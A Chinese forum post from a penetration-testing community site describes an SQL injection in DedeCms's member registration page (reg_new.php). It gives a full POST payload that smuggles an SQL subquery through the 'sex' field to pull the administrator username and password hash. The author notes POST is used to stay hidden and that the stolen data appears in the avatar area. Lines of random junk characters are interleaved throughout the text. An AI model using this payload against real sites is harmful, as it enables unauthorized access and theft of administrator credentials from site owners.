中国网络渗透测试联盟
标题:
DedeCms SQL注射漏洞再利用
[打印本页]
作者:
admin
时间:
2012-12-5 10:03
标题:
DedeCms SQL注射漏洞再利用
dedecms版本 20121122
/ l' E0 f+ K% D' {- W
, L) k4 ~- F7 `( x( s
需要magic_quotes_gpc=Off
% u$ B$ j! }/ \( Q7 @, L* f2 x$ F |) B
! B. x+ d8 `: u& G' F5 ~
应该是没有什么大危害的漏洞.
6 O, x4 @5 ]) ~2 e' ~3 u
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
% w" s$ D' H5 x( e) g
; @! p' A- U- t
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
m; I; ~5 p5 j2 m7 |7 A' n9 h
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
3 Y* O. w. J6 U9 ]0 H
5 ?) C! U4 I$ ~# ]) x1 @* T
http:///de/member/reg_new.php
, z6 T9 a! |! ` Q3 V, b. x& W
* d/ y, u8 z$ E3 |* `' E4 X
POST
' _! J1 Q7 T4 {4 K8 a4 [+ Z6 W7 t
& z7 h) K P, o D
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
, b' Q1 O6 z. W
! y9 Y6 A5 u( c
成功注册后,头像处里面有好玩的信息.
4 B8 M- A" l% u# e& @0 [/ a9 F
% B P2 {! ]: F; f( ?: F
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2